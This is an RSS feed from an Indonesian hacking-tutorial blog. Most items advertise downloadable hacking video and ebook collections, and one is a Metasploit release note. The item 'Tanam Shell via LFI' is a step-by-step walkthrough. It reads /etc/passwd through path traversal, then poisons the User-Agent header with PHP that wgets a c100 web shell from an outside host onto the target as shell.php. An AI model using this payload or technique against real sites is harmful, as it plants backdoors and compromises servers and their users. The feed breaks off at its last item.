<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Tutorial Belajar Website PHP MySQL ASP.Net Photoshop Coreldraw Flash Template &#187; Tutorial Hacking</title>
	<atom:link href="http://www.ilmuwebsite.com/tutorial-hacking/feed" rel="self" type="application/rss+xml" />
	<link>http://www.ilmuwebsite.com</link>
	<description>Webmaster Resource Center</description>
	<lastBuildDate>Wed, 01 Sep 2010 07:25:51 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>CD Tutorial Linux Hacking Backtrack 4 Free</title>
		<link>http://www.ilmuwebsite.com/tutorial-hacking/cd-tutorial-linux-hacking-backtrack-4-free</link>
		<comments>http://www.ilmuwebsite.com/tutorial-hacking/cd-tutorial-linux-hacking-backtrack-4-free#comments</comments>
		<pubDate>Thu, 22 Jul 2010 08:52:23 +0000</pubDate>
		<dc:creator>Admin</dc:creator>
				<category><![CDATA[Tutorial Hacking]]></category>

		<guid isPermaLink="false">http://www.ilmuwebsite.com/?p=2902</guid>
		<description><![CDATA[Oleh-oleh hacking tahun 2010 adalah Video Tutorial Hacking dengan Linux Backtrack 4. Video tutorial ini dapat anda download secara cuma-cuma. Memiliki size yang cukup membuat bandwith anda kembang-kempis, lumayan besar yakni 6.32 GB. Bagi anda yang memiliki bandwith lumayan cepat ketika mendownloadnya bisa di tinggal untuk pergi membeli cemilan, ke warteg, atau bisa di tinggal [...]]]></description>
			<content:encoded><![CDATA[ <p><img style="float: left; margin-right: 8px;" src="http://pmdkduaonline.files.wordpress.com/2009/07/backtrack4_560.jpg" alt="CD Tutorial Linux Hacking Backtrack 4 Free tutorial hacking web desain grafis" width="218" height="165" title="CD Tutorial Linux Hacking Backtrack 4 Free tutorial hacking web desain grafis" />Oleh-oleh <a target="_blank" href="http://www.ilmuwebsite.com/tutorial-hacking">hacking</a> tahun 2010 adalah <a href="http://www.ilmuwebsite.com/tutorial-hacking">Video Tutorial Hacking</a> dengan <a href="www.ilmuwebsite.com/tutorial-linux">Linux</a> Backtrack 4. Video tutorial ini dapat anda download secara cuma-cuma. Memiliki size yang cukup membuat bandwith anda kembang-kempis, lumayan besar yakni 6.32 GB. Bagi anda yang memiliki bandwith lumayan cepat ketika mendownloadnya bisa di tinggal untuk pergi membeli cemilan, ke warteg, atau bisa di tinggal tidur siang, ataupun sambil mengopi. Namun bagi anda yang memiliki bandwith yang sempit, proses downloadnya bisa anda tinggal pergi liburan selama 1 bulan atau lebih. <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="CD Tutorial Linux Hacking Backtrack 4 Free tutorial hacking web desain grafis" /> .  Apa yang di bahas dalam Video Tutorial Hacking ini ??<span id="more-2902"></span><br />
Episode 1 – Network Hacking – Arp Poisoning<br />
Episode 2 – Wireless Hacking – Cracking WEP<br />
Episode 3 – Wireless Hacking – DeAuth<br />
Episode 5 – Lock Picking – Bump Key<br />
Episode 6 – Phone Phreaking – Beige Box<br />
Episode 7 – Phone Phreaking/Network Hacking – Sniffing VOIP<br />
Episode 8 – Lock Picking – DIY Padlock Shims<br />
Episode 9 – Lock Picking – Mult-Disc Combo Locks<br />
Episode 10 – Hacking Basics – MD5<br />
Episode 11 – Website Hacking – Sql Injection<br />
Episode 12 – Hacking Basics – Backtrack<br />
Episode 13 – Website Hacking – XSS<br />
Episode 14 – Staying Secure – SSH Tunnel<br />
Episode 15 – Modding – Xbox Softmod<br />
Episode 16 – Wireless Hacking – Cracking WPA<br />
Episode 17 – Triple Boot – Windows, Backtrack, &amp; Ubuntu<br />
Episode 18 – Local Password Cracking<br />
Episode 19 – Lock Picking Basics<br />
Episode 20 – Ettercap<br />
Episode 21 – XSS Tunnel<br />
Episode 22 – Playstation 2 Softmod<br />
Episode 23 – Cracking WEP Update<br />
Episode 24 – Bypass Hotspot’s Access Controls<br />
Underground – Install Backtrack 3 on USB<br />
Underground – CSRF(Cross Site Request Forgery)<br />
Underground – Alternate Data Streams<br />
Underground – Local File Inclusion<br />
Underground – Windows Privilege Escalation<br />
Underground – Bluetooth Hacking<br />
Underground – VMWare<br />
Underground – Fix Google Mail Enumerator<br />
Underground – Home Made Lock Picks<br />
Underground – Downfalls of Anti-Virus Software Part 2<br />
Underground – Downfalls of Anti-Virus Software<br />
Underground – Evilgrade<br />
Underground – Trojan Basics<br />
Underground – Manipulating Windows User Accounts<br />
Underground – Combine Files<br />
Underground – Password Phishing<br />
Underground – Windows SMB Relay Exploit<br />
Underground – Application Patching<br />
Underground – Metasploit Autopwn<br />
Underground – Email Spoofing<br />
Underground – Introduction<br />
Extracting Database Information from Information_Schema<br />
FPGA MD5 Cracker<br />
Arduino ARP Cop<br />
Email Injection<br />
Ping of Death<br />
DNS Spoofing with Virtual Hosts<br />
Bypass Cisco Clean Access &amp; Cisco NAC Appliance<br />
Dual Boot – Windows &amp; Backtrack<br />
Sql Injection Challenge How-to<br />
How to use Intel Pro/Wireless 3945ABG in Backtrack 2<br />
Local Privilege Escalation Vulnerability in Cisco VPN Client</p>
<p><strong>Silahkan download di sini &#8230; </strong></p>
<p>http://hotfile.com/dl/25115438/d19f10f/bt.DVD.part01.rar.html</p>
<p>http://hotfile.com/dl/25115968/18fa8e5/bt.DVD.part02.rar.html</p>
<p>http://hotfile.com/dl/25116314/b963c46/bt.DVD.part03.rar.html</p>
<p>http://hotfile.com/dl/25116591/fab11bb/bt.DVD.part04.rar.html</p>
<p>http://hotfile.com/dl/25116915/2882182/bt.DVD.part05.rar.html</p>
<p>http://hotfile.com/dl/25117144/6f25cef/bt.DVD.part06.rar.html</p>
<p>http://hotfile.com/dl/25117442/205cd46/bt.DVD.part07.rar.html</p>
<p>http://hotfile.com/dl/25117654/12cb72b/bt.DVD.part08.rar.html</p>
<p>http://hotfile.com/dl/25117920/2b12f8b/bt.DVD.part09.rar.html</p>
<p>http://hotfile.com/dl/25118192/276ee91/bt.DVD.part10.rar.html</p>
<p>http://hotfile.com/dl/25118474/0a1c516/bt.DVD.part11.rar.html</p>
<p>http://hotfile.com/dl/25118886/dac42cc/bt.DVD.part12.rar.html</p>
<p>http://hotfile.com/dl/25119320/9a494df/bt.DVD.part13.rar.html</p>
<p>http://hotfile.com/dl/25124466/f426200/bt.DVD.part14.rar.html</p>
<p>http://hotfile.com/dl/25125403/c4bd091/bt.DVD.part15.rar.html</p>
<p>http://hotfile.com/dl/25126157/7c34a43/bt.DVD.part16.rar.html</p>
<p>http://hotfile.com/dl/25126892/6b2b305/bt.DVD.part17.rar.html</p>
<p>http://hotfile.com/dl/25127791/d516701/bt.DVD.part18.rar.html</p>
<p>http://hotfile.com/dl/25128566/e155665/bt.DVD.part19.rar.html</p>
<p>http://hotfile.com/dl/25129145/24ea2b2/bt.DVD.part20.rar.html</p>
<p>http://hotfile.com/dl/25129668/ce706b8/bt.DVD.part21.rar.html</p>
<p>http://hotfile.com/dl/25130322/08fa8bb/bt.DVD.part22.rar.html</p>
<p>http://hotfile.com/dl/25130962/8c4d9a7/bt.DVD.part23.rar.html</p>
<p>http://hotfile.com/dl/25131616/28a9ef2/bt.DVD.part24.rar.html</p>
<p>http://hotfile.com/dl/25132156/c3fb6cc/bt.DVD.part25.rar.html</p>
<p>http://hotfile.com/dl/25132903/d6d8232/bt.DVD.part26.rar.html</p>
<p>http://hotfile.com/dl/25133491/8dd5f2c/bt.DVD.part27.rar.html</p>
<p>http://hotfile.com/dl/25134062/365b929/bt.DVD.part28.rar.html</p>
<p>http://hotfile.com/dl/25134551/d52aa9a/bt.DVD.part29.rar.html</p>
<p>http://hotfile.com/dl/25135308/3aa5284/bt.DVD.part30.rar.html</p>
<p>http://hotfile.com/dl/25135898/135bc05/bt.DVD.part31.rar.html</p>
<p>http://hotfile.com/dl/25136466/9f68bbc/bt.DVD.part32.rar.html</p>
<p>http://hotfile.com/dl/25136722/1492995/bt.DVD.part33.rar.html</p>
 ]]></content:encoded>
			<wfw:commentRss>http://www.ilmuwebsite.com/tutorial-hacking/cd-tutorial-linux-hacking-backtrack-4-free/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tanam Shell via LFI dengan Metode Proc/Self/Environ</title>
		<link>http://www.ilmuwebsite.com/tutorial-hacking/tanam-shell-lfi-metode-procselfenviro</link>
		<comments>http://www.ilmuwebsite.com/tutorial-hacking/tanam-shell-lfi-metode-procselfenviro#comments</comments>
		<pubDate>Fri, 05 Feb 2010 03:01:04 +0000</pubDate>
		<dc:creator>gunslinger_</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Tutorial Hacking]]></category>
		<category><![CDATA[cara]]></category>
		<category><![CDATA[disclosure]]></category>
		<category><![CDATA[environ]]></category>
		<category><![CDATA[file]]></category>
		<category><![CDATA[lfi]]></category>
		<category><![CDATA[local]]></category>
		<category><![CDATA[menanam]]></category>
		<category><![CDATA[metode]]></category>
		<category><![CDATA[proc]]></category>
		<category><![CDATA[self]]></category>
		<category><![CDATA[via]]></category>

		<guid isPermaLink="false">http://www.ilmuwebsite.com/?p=1172</guid>
		<description><![CDATA[Dalam tutorial hacking kali ini saya akan coba mengimplementasikan bagaimana membuat shell pada target server lewat LFI dengan metode proc/self/environ, hal ini telah dibahas  sebelumnya di website milw0rm pada paper ke 361. Ok kita langsung saja&#8230; 1. Hal yang pertama dilakukan seperti teknik-teknik lainnya adalah kita terlebih dahulu coba temukan website yang vulnerable terhadap serangan [...]]]></description>
			<content:encoded><![CDATA[<div class="sticky_post"> <p><img style="margin-right: 8px; float: left;" src="http://www.twistedshells.com/hypervm-hacking.jpg" alt="Tanam Shell via LFI dengan Metode Proc/Self/Environ seputar hacking web desain grafis" width="203" height="193" title="Tanam Shell via LFI dengan Metode Proc/Self/Environ seputar hacking web desain grafis" />Dalam <a href="http://www.ilmuwebsite.com/tutorial-hacking">tutorial hacking</a> kali ini saya akan coba mengimplementasikan bagaimana membuat shell pada target server lewat LFI dengan metode proc/self/environ, hal ini telah dibahas  sebelumnya di website milw0rm pada paper ke 361.<br />
Ok kita langsung saja&#8230;</p>
<p>1. Hal yang pertama dilakukan seperti teknik-teknik lainnya adalah kita terlebih dahulu coba temukan <a href="http://www.ilmuwebsite.com">website</a> yang vulnerable terhadap serangan LFI.<span id="more-1172"></span></p>
<p>contoh : <strong>http://site.com/info.php?file=news.php</strong></p>
<p>2. coba kita ganti &#8220;news.php&#8221; dengan &#8220;../../../&#8221;.</p>
<p>contoh : <strong>http://site.com/info.php?file=../../../</strong></p>
<p>lalu kita mendapat error, seperti berikut&#8230;</p>
<p>Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99</p>
<p>ok sepertinya, kita mendapat kesempatan untuk memanfaatkan include ke file lain.<br />
selanjutanya kita coba temukan /etc/passwd.</p>
<p>contoh : <strong>http://site.com/info.php?file=etc/passwd</strong><br />
Tetapi kita masih mendapat error seperti berikut :</p>
<p>Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99</p>
<p>bagaimana jika kita naikan directorynya ?<br />
mari kita coba&#8230;</p>
<p>contoh : http://site.com/info.php?file=../../../../../../../../../etc/passwd</p>
<p>Ahoi, kita berhasil mendapatkan file /etc/passwd yang terlihat seperti berikut :</p>
<p>root:x:0:0:root:/root:/bin/bash<br />
daemon:x:1:1:daemon:/usr/sbin:/bin/sh<br />
bin:x:2:2:bin:/bin:/bin/sh<br />
sys:x:3:3:sys:/dev:/bin/sh<br />
sync:x:4:65534:sync:/bin:/bin/sync<br />
games:x:5:60:games:/usr/games:/bin/sh<br />
man:x:6:12:man:/var/cache/man:/bin/sh<br />
lp:x:7:7:lp:/var/spool/lpd:/bin/sh<br />
mail:x:8:8:mail:/var/mail:/bin/sh<br />
news:x:9:9:news:/var/spool/news:/bin/sh<br />
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh<br />
proxy:x:13:13:proxy:/bin:/bin/sh<br />
www-data:x:33:33:www-data:/var/www:/bin/sh<br />
backup:x:34:34:backup:/var/backups:/bin/sh<br />
list:x:38:38:Mailing List Manager:/var/list:/bin/sh<br />
irc:x:39:39:ircd:/var/run/ircd:/bin/sh<br />
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh<br />
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh<br />
libuuid:x:100:101::/var/lib/libuuid:/bin/sh<br />
syslog:x:101:102::/home/syslog:/bin/false<br />
klog:x:102:103::/home/klog:/bin/false<br />
hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false<br />
avahi-autoipd:x:104:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false<br />
gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false<br />
saned:x:106:113::/home/saned:/bin/false<br />
pulse:x:107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false<br />
messagebus:x:108:117::/var/run/dbus:/bin/false<br />
polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false<br />
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false<br />
haldaemon:x:111:120:Hardware abstraction layer,,,:/var/run/hald:/bin/false<br />
gunslinger:x:1000:1000:gunslinger_,,,:/home/gunslinger:/bin/bash<br />
snmp:x:112:65534::/var/lib/snmp:/bin/false<br />
guest:x:113:124:Guest,,,:/tmp/guest-home.rRZGXM:/bin/bash<br />
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin</p>
<p>3. mari kita check apakah /proc/self/environ bisa kita akses ?<br />
sekarang, ganti &#8220;/etc/passwd&#8221; dengan &#8220;/proc/self/environ&#8221;</p>
<p>contoh : http://site.com/info.php?file=../../../../../../../../../proc/self/environ</p>
<p>Jika anda mendapatkan yang seperti ini :</p>
<p>DOCUMENT_ROOT=/home/gunslinger/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,<br />
application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,<br />
image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac<br />
HTTP_HOST=www.site.com HTTP_REFERER=http://www.site.com/index.php?view=../../../../../../etc/passwd<br />
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15<br />
PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron<br />
REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665<br />
REQUEST_METHOD= GET REQUEST_URI = /index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron<br />
SCRIPT_FILENAME=/home/gunslinger/public_html/index.php SCRIPT_NAME=/index.php<br />
SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=gunslinger@site.com SERVER_NAME=www.site.com<br />
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=<br />
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k<br />
PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at www.site.com Port 80</p>
<p>Ternyata proc/self/environ dapat kita akses !<br />
jika anda mendapatkan halaman yang kosong (blank) /proc/self/environ tidak dapat di akses atau mungkin juga beroperating system *BSD</p>
<p>4. Sekarang mari kita injeksi dengann malicious kode dengan meracuni http-headernya . bagaimana kita bisa menginjeksinya? kita bisa menggunakan tamper data pada firefox addon.<br />
dapat anda download disini : https://addons.mozilla.org/en-US/firefox/addon/966<br />
buka tamper data di firefox lalu masukan url /proc/self/environ yang tadi &#8220;http://site.com/info.php?file=../../../../../../../../../proc/self/environ&#8221;<br />
lalu pada user-agent isikan dengan kode berikut :</p>
<p>&lt;?system(&#8216;wget http://r57.gen.tr/c100.txt -O shell.php&#8217;);?&gt;</p>
<p>atau</p>
<p>&lt;?exec(&#8216;wget http://r57.gen.tr/c100.txt -O shell.php&#8217;);?&gt;</p>
<p>lalu submit.</p>
<p>5. jika kita berhasil menginjeksi malicious kode berikut, maka shell akan ada di tempat seperti ini.</p>
<p>http://www.site.com/shell.php</p>
<p>happy hacking !</p>
 </div>
]]></content:encoded>
			<wfw:commentRss>http://www.ilmuwebsite.com/tutorial-hacking/tanam-shell-lfi-metode-procselfenviro/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Rilis: Metasploit Framework v. 3.3</title>
		<link>http://www.ilmuwebsite.com/tutorial-hacking/rilis-metasploit-framework-v-33</link>
		<comments>http://www.ilmuwebsite.com/tutorial-hacking/rilis-metasploit-framework-v-33#comments</comments>
		<pubDate>Fri, 27 Nov 2009 12:28:35 +0000</pubDate>
		<dc:creator>Loka Dwiartara</dc:creator>
				<category><![CDATA[Tutorial Hacking]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[Kurang lebih 10 hari sebelum artikel hacking news ini ditulis, metasploit merilis kembali versi terbaru dari senjata pamungkas para penetration tester. Bagi anda yang belum mengetahui senjata pamungkas yang satu ini, Metasploit merupakan sebuah tools hacking untuk melakukan penetration testing dimana dalam framework ini terdapat banyak exploit yang siap pakai, tools yang satu ini bekerja [...]]]></description>
			<content:encoded><![CDATA[ <p><img style="margin-right: 8px; float: left;" src="http://www.metasploit.com/images/hax_small.jpg" alt="Rilis: Metasploit Framework v. 3.3 tutorial hacking web desain grafis" width="206" height="147" title="Rilis: Metasploit Framework v. 3.3 tutorial hacking web desain grafis" />Kurang lebih 10 hari sebelum artikel <a href="http://www.ilmuwebsite.com/hacking/">hacking</a> news ini ditulis, metasploit merilis kembali versi terbaru dari senjata pamungkas para penetration tester. Bagi anda yang belum mengetahui senjata pamungkas yang satu ini, Metasploit merupakan sebuah <a href="http://www.ilmuwebsite.com/hacking/">tools hacking</a> untuk melakukan penetration testing dimana dalam framework ini terdapat banyak exploit yang siap pakai, tools yang satu ini bekerja mulai dari memanfaatkan celah sistem operasi, hingga celah aplikasi. Terdapat 120 exploit terbaru, dan lebih dari 100 module, dan 180 patch yang dapat digunakan langsung secara bebas.<br />
<span id="more-717"></span><br />
Metasploit mirip dengan <a href="http://www.ilmuwebsite.com/hacking/">tools hacking</a> lainnya, bagai Swiss Army Knife yang memiliki dua mata pisau, dimana satu sisi berguna untuk melindungi diri dari serangan dengan mencari-cari celah dan menambalnya, di sisi yang lain, metasploit apabila digunakan oleh tangan-tangan muda dan jahil maka akan terjadi hal destruktif yang merugikan banyak tentunya.</p>
<p>Kepada para admin, rajin-rajinlah mempatch sistem anda.</p>
<p>Lain kali penulis akan coba membahas lebih dalam mengenai Metasploit Framework, bagi anda yang ingin mengunduh dan mencoba untuk bersenang-senang dengan database metasploit yang terbaru silahkan langsung kunjungi website offisialnya <a target="_blank" rel="nofollow" href="http://www.metasploit.com/framework/download/">http://www.metasploit.com/framework/download/</a></p>
 ]]></content:encoded>
			<wfw:commentRss>http://www.ilmuwebsite.com/tutorial-hacking/rilis-metasploit-framework-v-33/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Ebook: Menggunakan 100 Tools Hacking</title>
		<link>http://www.ilmuwebsite.com/tutorial-hacking/ebook-menggunakan-100-tools-hacking</link>
		<comments>http://www.ilmuwebsite.com/tutorial-hacking/ebook-menggunakan-100-tools-hacking#comments</comments>
		<pubDate>Mon, 24 Aug 2009 17:38:08 +0000</pubDate>
		<dc:creator>Loka Dwiartara</dc:creator>
				<category><![CDATA[Tutorial Hacking]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[(Update Ebook New Version) Satu lagi sumber kekuatan para IT Security, dan sumber yang di cari-cari oleh para newbie yang ingin tau lebih dalam teknik-teknik hacking/cracking, ada satu ebook yang patut dijadikan rujukan. Ebook ini berjudul &#8220;Anti-Hacker Toolkit&#8221;. Dalam buku ini dijelaskan secara mendetil bagaimana cara menggunakan lebih dari 100 tools hacking. Penjelasannya secara teknis [...]]]></description>
			<content:encoded><![CDATA[ <p><img class="caption" src="http://pic.leech.it/i/dba37/d9c38464000d719dme.jpg" width="168" align="left" border="0" height="208" title="Ebook: Menggunakan 100 Tools Hacking tutorial hacking web desain grafis" alt="Ebook: Menggunakan 100 Tools Hacking tutorial hacking web desain grafis" /><span style="background-color: #ffff00;"><strong>(Update Ebook New Version) </strong></span>Satu lagi sumber kekuatan para IT Security, dan sumber yang di cari-cari oleh para newbie yang ingin tau lebih dalam teknik-teknik hacking/cracking, ada satu ebook yang patut dijadikan rujukan. Ebook ini berjudul &#8220;Anti-Hacker Toolkit&#8221;. Dalam buku ini dijelaskan secara mendetil bagaimana cara menggunakan lebih dari 100 tools hacking. Penjelasannya secara teknis cukup mudah untuk dimengerti dan diikuti. Selain membawakan penjelasan tools dalam menyerang, disini juga dijelaskan topik mengenai mendeteksi adanya serangan dan menangani serangan tersebut.  Topik-topik yang dibahas antara lain port scanners, vulnerability scanners, password crackers, and war dialers.</p>
<p><span id="more-674"></span></p>
<p>Toolsnya antara lain Netcat, Nessus, Tripwire, John the Ripper, and the Forensic Toolkit. Silahkan di unduh disini &#8230;</p>
<p><p class="download"><a target="_blank" rel="nofollow" href="http://www.megaupload.com/?d=G5HJ37DC" target="_blank">http://www.megaupload.com/?d=G5HJ37DC<br /></a></p></p>
 ]]></content:encoded>
			<wfw:commentRss>http://www.ilmuwebsite.com/tutorial-hacking/ebook-menggunakan-100-tools-hacking/feed</wfw:commentRss>
		<slash:comments>24</slash:comments>
		</item>
		<item>
		<title>Huge Collection Of Hack Tutorial Videos</title>
		<link>http://www.ilmuwebsite.com/tutorial-hacking/huge-collection-of-hack-tutorial-videos</link>
		<comments>http://www.ilmuwebsite.com/tutorial-hacking/huge-collection-of-hack-tutorial-videos#comments</comments>
		<pubDate>Thu, 11 Jun 2009 03:40:00 +0000</pubDate>
		<dc:creator>Loka Dwiartara</dc:creator>
				<category><![CDATA[Tutorial Hacking]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[Lagi-lagi koleksi video teknik hacking, yang berbeda dari yang pernah penulis post sebelumnya adalah video teknik hacking kali ini dikemas dalam resolusi 1024 x 768, 680 x 460, PAL (25fps), DivX. Dan yang lebih mantap adalah isi dari koleksi videonya : 128 Bit Wep Cracking With Injection!.swf A Penetration Attack Reconstructed.avi A Quick and Dirty [...]]]></description>
			<content:encoded><![CDATA[ <p><img class="caption" src="http://pic.leech.it/i/e0b27/666684835516124090.jpg" border="0" width="200" height="197" align="left" title="Huge Collection Of Hack Tutorial Videos tutorial hacking web desain grafis" alt="Huge Collection Of Hack Tutorial Videos tutorial hacking web desain grafis" />Lagi-lagi koleksi video teknik hacking, yang berbeda dari yang pernah penulis post sebelumnya adalah video teknik hacking kali ini dikemas dalam resolusi 1024 x 768, 680 x 460, PAL (25fps), DivX. Dan yang lebih mantap adalah isi dari koleksi videonya : 
<ul>
<li>128 Bit Wep Cracking With Injection!.swf</li>
<li> A Penetration Attack Reconstructed.avi</li>
<li> A Quick and Dirty Intro to Nessus using the Auditor Boot CD!.swf</li>
<li> Adding Modules to a Slax or Backtrack Live CD from <a href="http://www.ilmuwebsite.com/detil_hacking/24/" target="_self">Windows</a>.swf</li>
<li> Airplay replay attack &#8211; no wireless client required.swf</li>
<li> Anonym.OS LiveCD with build in Tor Onion routing and Privoxy.swf</li>
<li> BackTrack LiveCD to <a href="http://www.ilmuwebsite.com/detil_hacking/24/" target="_self">HD</a> Installation Instruction Video .swf</li>
<li> Basic Nmap Usage!.swf</li>
<li> Basic Tools for Wardriving!.swf<span id="more-625"></span></li>
<li> Bluesnarfer attack tool demonstration.swf</li>
<li> Bluesnarfing a <a href="http://www.ilmuwebsite.com/detil_hacking/24/" target="_self">Nokia</a> 6310i hand set.avi</li>
<li> Breaking WEP in 10 minutes.avi</li>
<li> Cain to ARP poison and sniff passwords!.avi</li>
<li> Complete Hacking Video using Metasploit &#8211; Meterpreter.swf</li>
<li> Cracking a 128 bit WEP key (Auditor).swf</li>
<li> Cracking a 128 Bit Wep key + entering the cridentials.swf</li>
<li> Cracking Syskey and the SAM on Windows Using Samdump2 and John!.swf</li>
<li> Cracking Windows Passwords with BackTrack and the Online Rainbow Tables at Plain-Text!.swf</li>
<li> Cracking WPA Networks (Auditor).swf</li>
<li> DoS attack against Windows FTP Server &#8211; DoS.avi</li>
<li> Droop s Box Simple Pen-test Using Nmap, Nikto, Bugtraq, Nslookup and Other Tools!.swf</li>
<li> Exploiting some bugs of tools used in Windows.swf.swf</li>
<li> Exploiting weaknesses of PPTP VPN (Auditor).swf</li>
<li> Finding Rogue <a href="http://www.ilmuwebsite.com/detil_hacking/24/" target="_self">SMB</a> File Shares On Your Network!.swf</li>
<li> Fun with Ettercap Filters!.swf</li>
<li> How to cura the local windows passwords in the SAM database .swf</li>
<li> How to decrypt SSL encrypted <a href="http://www.ilmuwebsite.com/detil_hacking/24/" target="_self">traffic</a> using a man in the <a href="http://www.ilmuwebsite.com/detil_hacking/24/" target="_self">middle</a> attack (Auditor).swf</li>
<li> How to sniff around switches using Arpspoof and Ngrep!.avi</li>
<li> Install VNC Remotely!.avi</li>
<li> Internet Explorer Remote Command Execution Exploit (CMDExe) Client Side Attack (Hi-Res).avi</li>
<li> Internet Explorer Remote Command Execution Exploit (CMDExe) Client Side Attack (Lo-Res).avi</li>
<li> John The Ripper 1.7 password cracker Installation Instruction Video .swf</li>
<li> Local Password Cracking Presentation for the <a href="http://www.ilmuwebsite.com/detil_hacking/24/" target="_self">Indiana</a> Higher Education Cybersecurity Summit 2005!.swf</li>
<li> MAC Bridging with Windows XP and Sniffing!.swf</li>
<li> Mass De-Authentication using void11 (Auditor).swf</li>
<li> Metasploit Flash Tutorial!.swf</li>
<li> MITM Hijacking.wmv</li>
<li> Nmap Video Tutorial 2 Port Scan Boogaloo!.swf</li>
<li> Sniffing logins and passwords.avi</li>
<li> Sniffing Remote Router Traffic via GRE Tunnels (Hi-Res).avi</li>
<li> Sniffing Remote Router Traffic via GRE Tunnels (Lo-Res).avi</li>
<li> Sniffing <a href="http://www.ilmuwebsite.com/detil_hacking/24/" target="_self">VoIP</a> Using Cain!.swf</li>
<li> Snort Instruction video &#8211; howto install into backtrack.swf</li>
<li> SSH Dynamic Port Forwarding!.swf</li>
<li> Start a session and get interactive commandline access to a remote Windows box!.avi</li>
<li> Telnet Bruteforce.avi</li>
<li> Tunneling Exploits through SSH.avi</li>
<li> Use Brutus to cura a box running telnet!.avi</li>
<li> Using NetworkActiv to sniff <a href="http://www.ilmuwebsite.com/detil_hacking/24/" target="_self">webpages</a> on a Wi-Fi network!.swf</li>
<li> WEP Cracking using Aireplay v2.2 Beta 7 (Whax 3.0).swf</li>
<li> WMF File Code Execution Vulnerability With Metasploit!.swf</li>
<li> WPA Cracking using Aireplay v2.2 Beta 7 (Whax 3.0).swf</li>
</ul>
<p><span style="font-weight: bold">Silahkan di download di sini : </span><br /><a target="_blank" href="http://rapidshare.com/files/230824983/Huge_Collection_Of_Hacking_Videos.part1.rar" target="_self">http://rapidshare.com/files/230824983/Huge_Collection_Of_Hacking_Videos.part1.rar</a><br /><a target="_blank" href="http://rapidshare.com/files/230825083/Huge_Collection_Of_Hacking_Videos.part2.rar" target="_self">http://rapidshare.com/files/230825083/Huge_Collection_Of_Hacking_Videos.part2.rar</a><br /> <a target="_blank" href="http://rapidshare.com/files/230825048/Huge_Collection_Of_Hacking_Videos.part3.rar" target="_self">http://rapidshare.com/files/230825048/Huge_Collection_Of_Hacking_Videos.part3.rar</a><br /><a target="_blank" href="http://rapidshare.com/files/230824882/Huge_Collection_Of_Hacking_Videos.part4.rar" target="_self">http://rapidshare.com/files/230824882/Huge_Collection_Of_Hacking_Videos.part4.rar</a><br />  <a target="_blank" href="http://rapidshare.com/files/230824795/Huge_Collection_Of_Hacking_Videos.part5.rar" target="_self">http://rapidshare.com/files/230824795/Huge_Collection_Of_Hacking_Videos.part5.rar</a><br /> <a target="_blank" href="http://rapidshare.com/files/230824916/Huge_Collection_Of_Hacking_Videos.part6.rar" target="_self">http://rapidshare.com/files/230824916/Huge_Collection_Of_Hacking_Videos.part6.rar</a><br /> <a target="_blank" href="http://rapidshare.com/files/230824692/Huge_Collection_Of_Hacking_Videos.part7.rar" target="_self">http://rapidshare.com/files/230824692/Huge_Collection_Of_Hacking_Videos.part7.rar</a></p>
<p>Bagi anda yang kesulitan untuk mendownload video tersebut, sudah kami sertakan dalam <a target="_blank" href="http://lapak-online.com/cd-hacking/" target="_blank">CD Hacking v.3</a> ( 3 DVD ).</p>
 ]]></content:encoded>
			<wfw:commentRss>http://www.ilmuwebsite.com/tutorial-hacking/huge-collection-of-hack-tutorial-videos/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>CD Video Hacking dan Cracking Software Gratis</title>
		<link>http://www.ilmuwebsite.com/tutorial-hacking/cd-video-hacking-dan-cracking-software-gratis</link>
